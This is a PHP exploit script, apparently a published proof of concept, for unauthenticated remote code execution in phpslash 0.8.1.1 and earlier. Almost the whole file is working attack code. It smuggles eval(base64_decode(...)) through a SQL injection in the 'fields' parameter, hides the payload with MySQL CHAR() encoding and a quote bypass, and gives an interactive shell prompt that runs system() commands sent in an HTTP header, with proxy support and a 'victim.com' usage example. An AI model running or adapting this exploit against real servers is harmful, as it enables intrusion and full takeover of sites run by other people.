#!/usr/bin/php -q <?php # # This file requires the PhpSploit class. # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. ################################################## # # phpslash <= 0.8.1.1 Remote Code Execution Exploit # - - - - - - - - - - - - - - - - - - - - - - - - - # RCE with no special rights (guest). # No special PHP conditions required. # - - - - - - - - - - - - - - - - - - - - - - - - - # #0 It was a private sploit, but I decided to publish # it #1 You did the fag on that one bro, it will not happen # again =). #2 Don't try to use it on hzv, I helped them # to patch this one before I publish it =) # - - - - - - - - - - - - - - - - - - - - - - - - - # Exploitation steps: # 1 - include/class/tz_functions.inc tz_strftime() # 2 - include/class/tz_functions.inc tz_generic() # 3 - include/tz_env.class generic() # error_reporting( E_ALL ^ E_NOTICE ); require('phpsploitclass.php'); // Main function function main() { // :) $web = new phpsploit(); $web->agent( 'Mozilla Firefox' ); // Hey ya :) head(); // Target $url = get_p( 'url', true ); // Proxy options $prh = get_p( 'proxhost' ); $pra = get_p( 'proxauth' ); // Use a proxy ? if( $prh ) { // host:ip $web->proxy( $prh ); // Authentication if( $pra ) $web->proxyauth( $pra ); } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' ); $c_sep = "print('$s_sep');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while( ($cmd = cmd_prompt()) !== false ) { // magic_quotes_gpc bypass $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) ); // Go =] $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' ); // Result $res = explode( $s_sep, $web->getcontent() ); // Erf if( !isset( $res[1] ) ) { print "\nFailed"; exit(1); } // Cool else { if( empty( $res[1] ) ) print "\nNo output: system() disabled OR cmd failed OR cmd without output"; else print "\n" . $res[1]; } } return; } // No more bug with " and $ function add_slashes( $str ) { return str_replace( '$', '\\$', addslashes( $str ) ); } // Command prompt function cmd_prompt() { print "\nshell>"; $cmd = trim( fgets( STDIN ) ); // Wanna stop =( ? if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) ) return false; else return $cmd; } // MySQL CHAR() encoding function to_char( $data ) { $chars = 'CHAR('; $len = strlen( $data ); for( $i = 0; $i < $len; $i++ ) { $chars .= ord( $data[ $i ] ); if( $i != $len-1 ) $chars .= ','; } return $chars . ')'; } // CLI params function get_p( $p, $exit = false ) { foreach( $_SERVER['argv'] as $key => $value ) { if( $value === '-' . $p ) { if( isset( $_SERVER['argv'][ $key+1 ] ) && !empty( $_SERVER['argv'][ $key+1 ] ) ) { return $_SERVER['argv'][ $key+1 ]; } else { if( $exit ) usage(); return true; } } } if( $exit ) usage(); return false; } // Headers =) function head() { print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n"; print "-------------------------------------------------\n\n"; print " About: \n"; print " by DarkFig < gmdarkfig (at) gmail (dot) com >\n"; print " http://acid-root.new.fr/\n"; print " #acidroot (at) irc.worldnet (dot) net [email concealed]\n\n"; return; } // Usage, can help.. function usage() { print " Usage:\n"; print " php spl.php -url <website> [options]\n\n"; print " Example:\n"; print " php spl.php -url http://victim.com/\n\n"; print " Options:\n"; print " -proxhost <ip:port> if you wanna use a proxy\n"; print " -proxauth <usr:pwd> proxy with authentication\n"; exit(0); } // Run baby main(); ?>